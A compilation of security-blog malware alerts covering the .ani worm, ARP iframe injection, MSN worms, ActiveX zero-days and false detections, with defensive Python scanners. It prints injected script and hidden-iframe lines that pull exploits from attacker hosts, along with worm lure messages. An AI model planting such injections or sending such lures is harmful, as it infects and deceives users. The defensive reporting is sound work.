This is an alert for Windows users: malware in China is exploiting the new “Windows Animated Cursor Handling” zero-day vulnerability. The new worm behaves like Worm.Win32.Fujacks.

It infects HTML, ASPX, PHP, HTM, JSP, ASP and EXE files, inserting harmful links that exploit the “Windows Animated Cursor Handling” zero-day vulnerability. The worm also carries some Chinese spam.

Users should block the following domains, where the worm is hosted:

2007ip.com

Microfsot.com

The worm’s author keeps releasing updated variants that exploit this .ani vulnerability. The exploit files are about 13 KB in size. Their MD5 hashes are:

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179

Kaspersky antivirus identifies it as “Trojan-Downloader.Win32.Agent.bky.”

Details About “.ani Zero-Day Vulnerability”

1. When you execute it, the following file is dropped:
%SYSTEM%\sysload3.exe

2. It adds the following registry entry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"

3. It uses the Internet Explorer process to download a config file from the following link:

http://a.2007ip.com/<removed>.css

4. The config file has the following content:

[config]
Version=1.0.6
NUM=7
1=http://a.2007ip.com/<removed>/01.gif
2=http://a.2007ip.com/<removed>/02.gif
3=http://a.2007ip.com/<removed>/03.gif
4=http://a.2007ip.com/<removed>/04.gif
5=http://a.2007ip.com/<removed>/05.gif
6=http://a.2007ip.com/<removed>/06.gif
7=http://a.2007ip.com/<removed>/07.gif
hos=http://if.iloveck.com/<removed>/hos.gif
UpdateMe=http://a.2007ip.com/5949645<removed>.exe
tongji=http://if.iloveck.com/<removed>/tongji.htm

5. Beware of the following content arriving by email:

From: i_love_cq@sohu.com
To: [random number]@qq.com
Subject:你和谁视频的时候被拍下的?给你笑死了!
Body:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
http://macr.microfsot.com/<removed>/134952.htm

6. The ani-worm also contains the following harmful URL:

http://macr.microfsot.com/<removed>/NOINDEX.HTM

7. The above page exploits the “.ani vulnerability”; the two URLs in it are:

http://macr.microfsot.com/<removed>/1.jpg
http://macr.microfsot.com/<removed>/2.jpg

8. The two files above are “.ani” files. These “ani-worm” files download a copy of the worm from the following URL:

http://a.2007ip.com/cs<removed>.exe

9. This ani-worm infects .HTML, .ASPX, .HTM, .PHP, .JSP, .ASP and .EXE files, and adds a malicious link to the .HTML, .ASPX, .HTM, .JSP and .ASP files. The link exploits the Windows Animated Cursor Handling zero-day vulnerability. The malicious link is:

<script src=http://macr.microfsot.com/<removed>.js></script>

10. The script at the above link loads another harmful URL:

http://macr.microfsot.com/Ad<removed>.jpg

11. It is a deliberately crafted “.ANI” file that downloads a copy of the worm from the following URL:

http://a.2007ip.com/5949645<removed>.exe

12. The body of the worm contains strings suggesting its author hates Kaspersky. See the image below.

[Image: Kaspersky ani-worm status]

ARP Attack to CISRT.org

With great apology to our visitors: we must announce that they may sometimes see malicious code while visiting some of our pages, and may think that our site has been compromised. That is not the case; it is probably due to an ARP attack. We have informed our web server provider about the issue. However, it is still not confirmed whether it is caused by an ARP attack or by some other issue.

Visitors see the following malicious code in some of our pages:

<iframe src=http://mms.nmmmn.com/<removed>.htm width=0 height=0 frameborder=0></iframe>

The link above uses the vulnerability of

A file “SMS.exe” is downloaded from this URL. Its size is around 37,888 bytes.

Kaspersky identifies it as “Trojan-Downloader.Win32.Baser.w.”

The malicious code injected by this ARP attack can download 20 trojans from ganbibi.com.

We recommend that users block the following two domains:

Nmmmn.com

Ganbibi.com
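A small scanner for the two kinds of injection described above (the ani-worm’s appended script tag and the ARP-injected hidden iframe), written as an added example; it is not CISRT’s own tooling. The block list is the set of domains the alerts tell users to block, and the sample page and its paths are constructed.

```python
"""
Detector for injected <script src=...> and hidden <iframe src=...> tags.

Added example, not CISRT's own tooling.  The ani-worm appends a script tag
such as <script src=http://macr.microfsot.com/...js></script> to web files,
and the ARP attack injected <iframe src=http://mms.nmmmn.com/...htm width=0
height=0 ...>.  Both use unquoted attribute values, which this scanner
accepts.  The block list is the set of domains the alerts recommend blocking;
the sample page below is constructed and its paths are invented.
"""
import re
from pathlib import Path
from urllib.parse import urlsplit

BLOCKED_DOMAINS = {"microfsot.com", "2007ip.com", "nmmmn.com", "ganbibi.com"}

# Opening <script ...> / <iframe ...> tags; attributes captured up to '>'.
TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.IGNORECASE)
# src=value, with the value double-quoted, single-quoted, or bare.
SRC_RE = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)
# width=0 / height=0 in quoted or bare form (the hidden-iframe trick).
ZERO_DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?0(?:px)?["']?(?=[\s"']|$)""", re.IGNORECASE)


def host_of(url):
    """Lower-case host of a URL, or '' when it has none (relative src)."""
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:
        return ""


def is_blocked(host, blocked=BLOCKED_DOMAINS):
    """True when host is a blocked domain or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in blocked)


def scan_html(text, blocked=BLOCKED_DOMAINS):
    """
    Return findings as (tag, url, reason) tuples in document order.
    reason is 'blocked-domain' when the src host is on the block list,
    or 'hidden-iframe' for a 0x0 iframe pointing anywhere else.
    """
    findings = []
    for m in TAG_RE.finditer(text):
        tag, attrs = m.group(1).lower(), m.group(2)
        src = SRC_RE.search(attrs)
        if not src:
            continue
        url = next(g for g in src.groups() if g is not None)
        if is_blocked(host_of(url), blocked):
            findings.append((tag, url, "blocked-domain"))
        elif tag == "iframe":
            zero_dims = {d.lower() for d in ZERO_DIM_RE.findall(attrs)}
            if {"width", "height"} <= zero_dims:
                findings.append((tag, url, "hidden-iframe"))
    return findings


def scan_file(path, blocked=BLOCKED_DOMAINS):
    """Scan one web file (HTML/ASP/JSP/PHP...) and return its findings."""
    return scan_html(Path(path).read_text(encoding="utf-8", errors="replace"), blocked)


# Constructed sample page: two injections of the kinds described above,
# one hidden iframe to an unrelated host, and one legitimate script.
SAMPLE_PAGE = """<html><body><p>Welcome</p>
<script src=http://macr.microfsot.com/x.js></script>
<iframe src=http://mms.nmmmn.com/y.htm width=0 height=0 frameborder=0></iframe>
<iframe src="http://example.org/ad.htm" width="0" height="0"></iframe>
<script src="https://cdn.example.org/app.js"></script>
</body></html>"""

if __name__ == "__main__":
    for tag, url, reason in scan_html(SAMPLE_PAGE):
        print(f"{reason:15} <{tag}> {url}")
```

Run it over a web root with `scan_file` on each .html/.asp/.jsp/.php file; a "blocked-domain" hit on a file you did not change is the infection signature described above.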

Black Friday, Backdoor.Haxdoor

Black Friday proved a dreadful day for many Chinese users of Windows XP, particularly users of Norton tools. We received complaints from many users about one problem: Norton identified the two system files “netapi32.dll” and “lsasrv.dll” as Backdoor.Haxdoor.

According to their observations, it happened when they updated to the May 17, 2007 definitions. Norton then deleted the two files and rebooted the system. The OS boots into a blue screen and displays the following file protection message:

When you open the main Window, you can see the following message:

Note that not all Windows versions are affected. Only simplified Chinese Windows XP SP2 is affected, and only on systems that have the Microsoft bulletin MS06-070 patch (KB924270) installed.

Symantec has since fixed this false detection in its LiveUpdate definitions (20070517, version 71).

This issue affected Chinese users greatly. According to Rising’s statistics, more than 7,000 Windows users complained to Rising about it.

We hope users will not encounter this kind of issue again.

Three New 0-Day Exploits Used in Drive-By-Download Attacks in China

This week, we detected three new 0-day exploits used in drive-by-download attacks in China: the BaoFeng (mps.dll) remote code execution exploit, the BaoFeng (Config.dll) remote code execution exploit, and the Chinagames (CGAgent.dll) remote code execution exploit. These exploits are being used widely.

BaoFeng (mps.dll) Remote Code Execution Exploit

The BaoFeng (mps.dll) remote code execution exploit works against users who have installed BaoFeng products. Installing BaoFeng apps registers the following ActiveX control on the system:

Affected versions:
BaoFeng products up to and including 3.09.04.17

CLSID: 6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB
Problem file: mps.dll
Problem function: Sub OnBeforeVideoDownload(ByVal URL As String)

BaoFeng (Config.dll) Remote Code Execution Exploit

Installing BaoFeng apps also registers the following ActiveX control on the system:

Affected versions:
BaoFeng products up to and including 3.09.04.17

CLSID: BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05
Problem file: Config.dll
Problem function: Sub SetAttributeValue(
    ByVal lpQueryStr As String,
    ByVal bstrAttributeName As String,
    ByVal lpValueStr As String
)

Chinagames (CGAgent.dll) Remote Code Execution Exploit

Installing Chinagames products registers the following ActiveX control on the system:

Affected versions:
Chinagames 2009

CLSID: 75108B29-202F-493C-86C5-1C182A485C4C
Problem file: CGAgent.dll
Problem function: Sub CreateChinagames(ByVal lpszToken As String)

So far, no patch is available for these 0-day exploits. Until one is, you can disable the ActiveX controls with the following CLSIDs in Internet Explorer:

CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05
CLSID:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB
CLSID:75108B29-202F-493C-86C5-1C182A485C4C

Alternative:

You can also import the following registry file, which sets the kill bit for the three controls:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{75108B29-202F-493C-86C5-1C182A485C4C}]
"Compatibility Flags"=dword:00000400
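To verify an exported .reg file against the advice above (the kill bit is bit 0x400 of “Compatibility Flags”, and other bits may legitimately be set alongside it), here is an added Python example; it is not CISRT’s tool, and the sample export it parses is constructed, including one deliberately unprotected CLSID.

```python
"""
Verifier and generator for Internet Explorer ActiveX kill-bit exports.

Added example, not CISRT's tooling.  Internet Explorer refuses to load a
control whose "Compatibility Flags" value (under
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID})
has bit 0x400 set.  A flag value such as 0x500 still has the kill bit; a
missing key or a value of 0 does not.  The parser also accepts the flattened
"[key] "value"=dword:..." layout that blog copies of .reg files often have.
"""
import re

KILL_BIT = 0x400  # COMPAT_EVIL_DONT_LOAD

# CLSIDs named in the advisory above.
ADVISORY_CLSIDS = (
    "6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB",  # BaoFeng mps.dll
    "BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05",  # BaoFeng Config.dll
    "75108B29-202F-493C-86C5-1C182A485C4C",  # Chinagames CGAgent.dll
)

COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
KEY_RE = re.compile(r"^\[" + re.escape(COMPAT_KEY) + r"\\\{([0-9A-Fa-f-]{36})\}\]$", re.IGNORECASE)
VALUE_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{1,8})$', re.IGNORECASE)


def parse_compat_flags(reg_text):
    """Map CLSID (upper case, no braces) -> Compatibility Flags int from a .reg export."""
    flags = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            head, _, rest = line.partition("]")   # tolerate value on the same line
            m = KEY_RE.match(head + "]")
            current = m.group(1).upper() if m else None
            line = rest.strip()
            if not line:
                continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            flags[current] = int(m.group(1), 16)
    return flags


def kill_bit_status(reg_text, clsids=ADVISORY_CLSIDS):
    """Return {clsid: True/False}: True iff the kill bit is set for that CLSID."""
    flags = parse_compat_flags(reg_text)
    return {c.upper(): bool(flags.get(c.upper(), 0) & KILL_BIT) for c in clsids}


def make_killbit_reg(clsids=ADVISORY_CLSIDS, existing_flags=None):
    """Build a .reg export that sets the kill bit while preserving other flags already present."""
    existing_flags = existing_flags or {}
    lines = ["Windows Registry Editor Version 5.00", ""]
    for c in clsids:
        value = existing_flags.get(c.upper(), 0) | KILL_BIT
        lines.append(f"[{COMPAT_KEY}\\{{{c.upper()}}}]")
        lines.append(f'"Compatibility Flags"=dword:{value:08x}')
        lines.append("")
    return "\n".join(lines)


# Constructed sample export: first key correct, second flattened onto one
# line with an extra flag bit, third present but with the kill bit unset.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05}] "Compatibility Flags"=dword:00000500

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{75108B29-202F-493C-86C5-1C182A485C4C}]
"Compatibility Flags"=dword:00000000
"""

if __name__ == "__main__":
    for clsid, protected in kill_bit_status(SAMPLE_REG).items():
        print(f"{clsid}: {'kill bit set' if protected else 'NOT protected'}")
```

On a live machine, export the ActiveX Compatibility key with regedit and feed the file to `kill_bit_status`; any False entry is a control the exploit page can still instantiate.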

BaoFeng is a well-known media player in China. According to iUserTracker reports from March 2009, BaoFeng Media Player holds a 61.47% market share, more users than Windows Media Player.

imageXX.zip, MSN worm variant

Today, we got another update on the MSN worm variant. A new filename, “imageXX.zip”, has come to light (it arrives as a zip file, like the previous “image41.zip”).

The zip file contains a “.com” file named “imageXX.JPG-www.photosmart.com.”

The screenshot below shows how imageXX.zip sends the “.zip” file to the MSN contact list:

[Image: imageXX worm for MSN users]

The filename is “imageXX.zip” and it contains “imageXX.JPG-www.photosmart.com.”

The size of the file is 60,928 bytes.

Its MD5 hash is: b18cc1ed9eac567af78e58f769b2e813

Kaspersky detects it as “Trojan-Downloader.Win32.Injecter.n.”

Details of imageXX.zip

1. It drops the zip file and a copy of itself to the following locations on your system:
%System%\nvsvc64.exe
%temp%\XX.exe
%temp%\imageXX.zip (XX is a random number, for example “image41.zip”)

This worm variant adds the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"nVidia Display Driver"="nvsvc64.exe"

It sends out the following messages:

This picture isn’t you… right?
Wow i think i found your pic on myspace!
hah I think I found an old pic of us!
haha lets hope your parents dont see this picture of you 😀
hey did i ever show you this picture of me?
is it ok if I add this pic to my new slideshow?
can i up some of these pics of ya to my myspace profile?
you care if i put this pictuer of you in my new album?
sry about the messup i fixed the pic! Try it one more time pz
is this pic tooo sexy for photobucket??
wow I just dyed my hair… You will never believe the color it is now. lol And dont laugh
my crazy sister wants u to see these pics for some reason… take a look
OMFG!!!!!!!! 😀
wow! look at this old picture i found….
wanna see this pic of my Boobs?
Can i put this pic of you into my new myspace album?
Take a look at the new pics already! :p
I cant believe they wanted me to upload this picture to facebook lol. Its terrible. Like my outfit tho?
Lmfao hey im sending my new pictures! Check em out!
I’ve been editing some pics you should def see em loL! accept 🙂
Can you believe somone actually wears this size bra? I could use it for a Tent.
haha, this guy up my street just slammed his $90k car into a telephone pole! I got a pic of it with my cellphone
dude i just got these pictures off my digital for you! Gimme a moment to find em and send
Wanna see my pics before i send em to facebook?
do you think this picture is too kinky for Myspace?
OMG just accept please its only some pics!!
Hey accept my pictures, i got a bunch from when i was like a toddler :X
I think this picture is terrible. but my friends on myspace want to see it. please dont show noone.
Hey just finished new myspace album! 🙂 theres a few kinky ones in there!
OMG, i found ur pic on cuteornot.com! Check it out!!!
Have you seen me Naked Yet 😀
ok, I DO NOT like my new hair color.. but people on facebook do. what do you think? And no laughing! lol
hey you got a myspace album? anyways heres my new myspace album 🙂 accept k?
do I look dumb in this picture? I want to put it on myspace.
hey man accept my pics. 🙁 i just edited it to look maad funny..
Dude i found your picture on hotornot.com! Take a look!

How to Get Rid of It?

Step 1:

Go to the registry and delete the following registry entry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"nVidia Display Driver"="nvsvc64.exe"

Step 2:

Restart Windows

Step 3:

Delete the following files from the system:

%System%\nvsvc64.exe
%temp%\imageXX.zip
%temp%\XX.exe

Kaspersky (China) Sues Rising

On May 19, we encountered a false detection case involving the Kaspersky antivirus tool.

On May 23, Rising announced that the Kaspersky antivirus tool had mistakenly detected 22 files as viruses and removed them from users’ systems over a period of six months. It also claimed that Kaspersky had let Chinese users down.

On July 5, Rising made another announcement listing further Kaspersky false detections from the previous fifteen days.

For its part, Kaspersky (China) published the following announcements:

On May 20, Kaspersky made false detections.

On May 22, Kaspersky falsely detected WinXP file known as shdocvw.dll.

On June 1, Kaspersky falsely detected a Tencent QQ file.

On July 2, Kaspersky announced that it had sued Rising; the case will be heard in the Tianjin No. 1 Intermediate People’s Court.

Microsoft Security Update Worm

Microsoft has issued a notification about a fake Microsoft Security Update for June 2007.

It is in fact Trojan spam disguised as a Microsoft Security Update. The message claims to deliver an update for Internet Explorer, but what it delivers is a Trojan.

Kaspersky identifies it as “Trojan-Downloader.Win32.Agent.avk.”

The spam details are as follows:

From: “MSIE Update” security14@microsoft.com

Subject: Microsoft Security Update

Body:

Microsoft Security Bulletin MS06-31

Cumulative Security Update for Internet Explorer (145677125)

Published: June 3, 2007

Version: 1.0

Summary

Who should read this document: Customers who use Microsoft Windows

Impact of Vulnerability: Remote Code Execution

Maximum Severity Rating: Critical

Recommendation: Customers should apply the update immediately.

Security Update Replacement: This bulletin replaces several prior security updates. See the frequently asked questions (FAQ) section of this bulletin for the complete list.

Internet Explorer for Microsoft Windows XP Service Pack 2 – Download the update

Revisions:

June 3, 2007: Bulletin published.

Details of this malicious Trojan:

The following URL is part of the Trojan:

http://amyberman.com/updatems06<removed>

The size of this malicious file is 8,704 bytes.

It is packed with UPX 2.0. Its MD5 hash is:

1884cae661e902d3414b12adf38e4e2b

Summer2008.zip, IRC-Worm.Win32.Agent.a

Another new worm is circulating via MSN. The file is known as “summer2008.zip.” Inside the zip file is a “.scr” file (“summer2008.scr”).

This Trojan sends messages in various languages; a recent update added a Chinese version written in pinyin. Kaspersky identifies it as “Backdoor.Win32.IRCBot.acd” (initially it was known as “IRC-Worm.Win32.Agent.a”).

This Trojan sends the following message to MSN users:

English version:

Look how wasted Paris Hilton is, after she got jailed 🙁
You and Me !!! …. look :p
Look at my photos hihi :p
Hey please accept my photos 😮 !!
A photo with me and my best friend :$ !!
This is me totaly naked 😮 please dont send to anyone else
Look what i found on the NET 😮
Jessica Alba NUDE !!

Chinese version (pinyin):

kAN BA LI XI ER DUN JIN JIANYU HOU SHI DUO ME QIAOCUI 🙁
NI HE WO !!! …. QING KAN :p
KAN WO DE ZHAOPIAN :p
JIESHOU WO DE ZHAO PIAN 😮 !!
YI ZHANG WO GEN WO PENGYOU ZUI HAO DE ZHAOPIAN :$ !!
KAN WO DE ZHAOPIAN :p
ZHE SHI WO DE LUOZHAO 😮 QING BU YAO FA GEI BIEREN !!

Other versions:

bak sana Paris Hilton ne hale gelmis hapiste 🙁
Sen ve Ben !!! …. BAK :p
Baksana benim fotograflara hihi :p
Hey benim fotolarimi kabul et 😮 !!
Iyi arkadasimla fotorafdayim :$ !!
benim bu ciplak fotoda 😮 ama baskasina yollama
bak ne buldum 😮 Jessica alba ciplak !!

Regarde comment Paris Hilton parait efondr?apr qu’elle ai ?jeter en prison 🙁
Toi et moi !!! …. regarde :p
Regarde mes photos :p
Hey s’il te plait accepte mes photos 😮 !!
Une photo de moi et mon meilleur ami :$ !!
C’est moi totalement nu 😮
s’il te plait ne l’envoie a personne d’autre
Regarde ce que j’ai trouv?sur le net 😮 Jessica Alba NU !!

Kijk hoe erg Paris Hilton er aan toe is na gevangenschap 🙁
Jij en Ik !!!! …. kijk :p
Kijk eens naar mijn fotos hihi :p
HEY !! accepteer mn fotos dan !
met mijn beste vriend op de foto !! :$
Dit ben ik naakt op de foto, stuur alsjeblieft niet door.
Kijk wat ik gevonden heb 😮 Jessica Alba naakt !!

guck wie scheisse Paris Hilton aussieht, seitdem sie wieder aus dem knast ist 🙁
du und ich !!! ….guck :p
siehe meine fotos hihi :p
hey bitte nimm meine fotos an 😮 !!
ein foto mit meinem besten freund und mir :$ !!
das bin ich total nackt 😮 bitte sende es niemand anderem
guck was ich im internet gefunden habe 😮 jessica Alba NACKT !!

Guarda come Paris Hilton sprecato ? dopo che era imprijonata 🙁
Tu ed io !!! …. guarda :p
Guardi le mie foto hihi :p
Mairee photos accept karo 😮 !!
Una foto con me ed il mio amico migliore :$ !!
Questa e me totaly nudo 😮 prego non trasmette a chiunque
Osservi che cosa ho trovato sul internet 😮 Jessica alba NUDA !!

Veja como Paris Hilton est?acabada depois de ter sido presa 🙁
Voc?e eu !!!! …. Veja :p
Veja as minhas fotos hehehe :p
Por favor aceite as minhas fotos 😮 !!
Uma foto com o meu melhor amigo e eu :$ !!
Esta sou eu totalmente nua 😮 por favor nmande isso pra ningu
Olha o que eu achei na NET 😮 Jessica Alba NUA !!

Kolla hur fstd Paris Hilton, efter att hon fgslades 🙁
Du och jag !! …. Kolla 😉
Kolla p?min bilder, hihi :p
Hey, acceptera mina bilder, snla 😮
En bild p?mig och min bta v :$ !!!
Detta jag HELT naken.. 😮 Skicka inte till non annan, snla…
Kolla vad jag hittade p?net 😮 Jessica Alba NAKEN !!

Mira co Paris Hilton es perdida despu de ser encarcelada 🙁
Usted e yo !!! …. Mira :p
Mira mis fotos jejeje :p
Ha aceptado mis fotos por favor 😮 !!
Una foto con mi mejor amigo e yo :$ !!
Esta soy yo totalmente desnuda 😮
por favor no env para nadie Mira lo que encontr?en la WEB 😮 Jessica Alba DESNUDA !!

Lede hvor spild Paris Hilton er efter hun fik fgsel 🙁
Jer og Mig !!! … se :p
Se p?min fotos :p
Hej behage optage min foto 😮 !!
EN foto hos mig og min bedst ven :$ !!
denne er mig hele bar behage vage vendlig og sende den ikk til nogle 😮
Lede hvad jeg fandt oven p?den net 😮 Jessica Alba bar !!

When executed, the worm drops the following files in the %WINDOWS% directory:

images0XX.zip
photos0XX.zip
albumXX.zip
photoXX.zip
pictures0XX.zip
pictureXX.zip (XX is a random number, for example album39.zip or images091.zip)

The worm size is 120,832 bytes.

It is packed with NTKrnl and has the following MD5 hash:

e1d1e9e2b1882f2c99c6a131341dea21.

How to Remove This Worm:

Step 1:

Go to “Start”, choose “Run”, type “REGEDIT” and press Enter to open the Registry Editor.

Step 2:

Open the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad

In the right pane, delete "printers"="{CLSID}"
(note down the {CLSID} before deleting it)

Step 3:

Open HKEY_CLASSES_ROOT\CLSID

Delete the {CLSID} key you noted down in Step 2.

Step 4:

Reboot your system

Step 5:

Delete the following files from your system:

%System%\notiffy.dll
%System%\printers.exe
%userprofile%\new.txt
%Windows%\{string1}{random number}.zip (file size: 119 KB)

{string1} is one of the following:

images0
photos0
album
photo
pictures0
picture

For example:

images047.zip contains a file like images047.scr

photo92.zip contains a file like photo92.scr

Photo Album.zip Spreads via MSN

Recent reports reveal that a worm, “photo album.zip”, is currently spreading via MSN Messenger. It is another variant of Backdoor.Win32.IRCBot.

If you receive one of the following messages through MSN Messenger, do not open the file.

HEY lol i’ve done a new photo album !:) Second ill find file and send you it.

Hey wanna see my new photo album?

Hey accept my photo album, Nice new pics of me and my friends and stuff and when i was young lol…

Hey just finished new photo album! 🙂 might be a few nudes 😉 lol…

hey you got a photo album? anyways heres my new photo album 🙂 accept k?

hey man accept my new photo album.. 🙁 made it for yah, been doing picture story of my life lol..

1. The “.zip” file contains “photo album2007.pif.”

2. The size of the worm is 18,944 bytes.

3. It’s packed with UPX.

4. Kaspersky identifies it as “Backdoor.Win32.IRCBot.aaq.”

5. While running, this IRCBot adds the following file to your system:

%windows%\photo album.zip

6. It also adds a “.dll” file to Internet Explorer (explorer.exe):

%system%\rdshost.dll

7. It connects to the following IRC channel:

darkjester.xplosionirc.net

Read the detailed report regarding this worm in Chinese by our analyst “Moonny.”

Another False Detection Case

Yesterday, a false detection case from Symantec came to light. Today, Kaspersky had another false detection case.

Some Windows users in China complained that Kaspersky antivirus detects the “rsaupd.exe” file on their system as “Trojan.Win32.Inject.av.”

Note that “rsaupd.exe” is a component of Rising AntiSpyware; it updates the product’s databases.

Rising AntiSpyware is a renowned anti-spyware tool in China. The majority of Chinese prefer it for the security of their systems. Lots of Kaspersky users who also use Rising AntiSpyware software encountered this issue.

Kaspersky has now fixed the problem. The false detection drove Chinese users crazy for two days; the situation is now under control.

G038_jpg.zip, IRCBot.aex

Yesterday we received a variant of the MSN worm from a friend in Holland.

It is known as “G038_jpg.zip.” The file contains a “.com” file named “www.G038_jpg-msn.com.”

Kaspersky identifies it as “Backdoor.Win32.IRCBot.aex.”

Detailed information about this worm:

The filename is G038_jpg.zip and it includes a “.com” file named “www.G038_jpg-msn.com.”

Its size is 435,200 bytes.

This worm has the following MD5 hash:

3ede1801994c59b35b96aac2b13852d1

Kaspersky detects it as “Backdoor.Win32.IRCBot.aex.”

When executed, it drops the following files:

%Windows%\G038_jpg.zip
%Windows%\CDSpeed.exe

It adds the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"CDSpeed.exe"="%Windows%\CDSpeed.exe"

This worm modifies the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
"SFCDisable"=dword:ffffff9d
"SFCScan"=dword:00000000

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
"WaitToKillServiceTimeout"="7000"

This Trojan modifies various registry entries and some important system files, such as FTP.exe, TFTP.exe and TCPIP.sys.

Users receive the following messages:

dessa egentligen trevliga: P
gyckel mte se dig detta fotografera
du fick se detta dess galet :p
estes s realmente agradeis 😛
wow voc?viu este?
como voc?gosta de me nesta foto
voc?comeu ver este seu assim engrado
Bu resimler nasil sence bir bakarmisin 🙂
su komik resimlerime baksana 😀
bak 😛
Kiz kardesim bunlari sana yollamami sledi 😉
bu resimler space in nasil
Space ime bun resimleri eklesem sence nasil olur
avete ottenuto vedere questo relativo cos?divertente
come lo pensate osservi qui sguardo di lol
a questo controllo di distorsione di velocit?questo fuori
el lol mi hermana quisiera que le enviara este bum de foto
vengo de fi este foto bum
ey i que hace el bum de foto!
Si vea el loL del em
l tipo, me acepta por favor su solamente bum de foto: (!
lol meine Schwester wscht mich Ihnen dieses Fotoalbum schicken
Geck, nehmen bitte sein nur mich Fotoalbum an: (!
he mhten mein neues Fotoalbum sehen?
hoe vind je dit er uit zien ?
hoe vind je dit ?
echt erg kijk dan
zo hee moet je dit zien echt niet normaal
zo moet je me hier op zien lol
lol he hoe vind je me hier op
eeeh c mes tof :p
c seulement mes tof de derniers vacances
tu dois voire les tof de notre bande
comment est-ce que je regarde sur cette photo ?
le lol ceci est dre
ma soeur a voulu que tu regarde ca
daut de la reproduction sonore avez-vous vu ceci ?
looooook :p
loooooooooooool 😀
lol he looks weird on this photo
omg check this out man this is funny
lol you got to see this 😛

How to Fix It

Step 1:

Delete the following registry entry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CDSpeed.exe"="%Windows%\CDSpeed.exe"

Step 2:

Reboot Windows

Step 3:

Delete the following malicious files:

%Windows%\G038_jpg.zip
%Windows%\CDSpeed.exe

Step 4:

Restore the original FTP and TFTP clients by copying the following files:

%System%\microsoft\backup.tftp to:

%System%\tftp.exe
%System%\dllcache\tftp.exe

%System%\microsoft\backup.ftp to:

%System%\ftp.exe
%System%\dllcache\ftp.exe

Step 5:

Set the following registry values:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
"SFCDisable"=dword:00000000

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
"WaitToKillServiceTimeout"="20000"

Step 6:

Delete the "SFCScan" value from the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
"SFCScan"

MSN Worm outbreak

Many MSN users in China are facing a new worm known as “photos.zip.” It is spreading widely among Internet Explorer users.

This worm sends messages in Spanish, English, Chinese, French and other languages. The messages contain text such as “My friend took nice photos of me. you Should see em loL!” and “Hey regarde les tof, c’est moi et mes copains entrain de…. :D”.

We issued an alert to Chinese users at 5:30 PM on June 1, 2007 to warn them about this worm.

It arrives as a zip file containing “photos album_2007_5_26.scr.”

Its size is 479,232 bytes.

This worm has the following MD5 hash:

9784ab71076f583ce02de0340554aefa

When executed, it registers itself for startup by changing the following registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
"syshosts"="{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"

It uses multiple languages to send the following messages:

English version:

Here are my private pictures for you
Here are my pictures from my vacation
My friend took nice photos of me.you Should see em loL!
its only my photos!
Nice new photos of me and my friends and stuff and when i was young lol…
Nice new photos of me!! :p
Check out my sexy boobs 😀

French version:

hey regarde mes tof!! :p
ma soeur a voulu que tu regarde ca!
hey regarde les tof, c’est moi et mes copains entrain de…. 😀
j’ai fais pour toi ce photo album tu dois le voire 🙂
tu dois voire ces tof
mes photos chaudes 😀
c’est seulement mes tof :p

Dutch version (Netherlands or Belgium):

zijn enige mijn foto’s
wanna Hey ziet mijn nieuw fotoalbum?
Hey beindigde enkel nieuw fotoalbum! 🙂
hey keurt mijn nieuw fotoalbum goed.. :p
